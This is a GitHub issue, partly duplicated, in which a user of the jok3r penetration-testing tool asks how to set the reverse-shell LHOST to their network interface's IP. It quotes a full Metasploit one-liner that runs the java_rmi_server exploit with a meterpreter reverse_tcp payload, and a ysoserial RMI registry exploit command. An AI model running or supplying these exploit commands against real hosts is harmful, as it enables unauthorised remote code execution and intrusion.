You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hi,
Firstly, thank you very much for your working , really it's very useful tool.
My question:
How can change my Reverse IP for exploit attacks, For.ex ;
I running the following command for a attack
python3 jok3r.py attack -m testDB -f "service=java-rmi" --fast
I see in the screen my reverse IP such as LHOST 127.0.0.1, I think So, this exploit could not doing connection.
_cmd> sudo msfconsole -q -x "use exploit/multi/misc/java_rmi_server; set RHOST 192.168.183.11; set RPORT 5001; set VERBOSE true; set LPORT 8443; set SRVPORT 9080; ; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 8443; set AutoRunScript multi_console_command -c getuid,ps,exit; exploit; sleep 2; exit"
Hi,
Firstly, thank you very much for your working , really it's very useful tool.
My question:
How can change my Reverse IP for exploit attacks, For.ex ;
I running the following command for a attack
python3 jok3r.py attack -m testDB -f "service=java-rmi" --fast
I see in the screen my reverse IP such as LHOST 127.0.0.1, I think So, this exploit could not doing connection.
_cmd> sudo msfconsole -q -x "use exploit/multi/misc/java_rmi_server; set RHOST 192.168.183.11; set RPORT 5001; set VERBOSE true; set LPORT 8443; set SRVPORT 9080; ; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 8443; set AutoRunScript multi_console_command -c getuid,ps,exit; exploit; sleep 2; exit"
cmd> ./run-ysoserial.sh ysoserial.exploit.RMIRegistryExploit 192.168.183.11 5001 Myfaces1 127.0.0.1_
How can do my eth0 interface IP to replacement as LHOST IP?
The text was updated successfully, but these errors were encountered: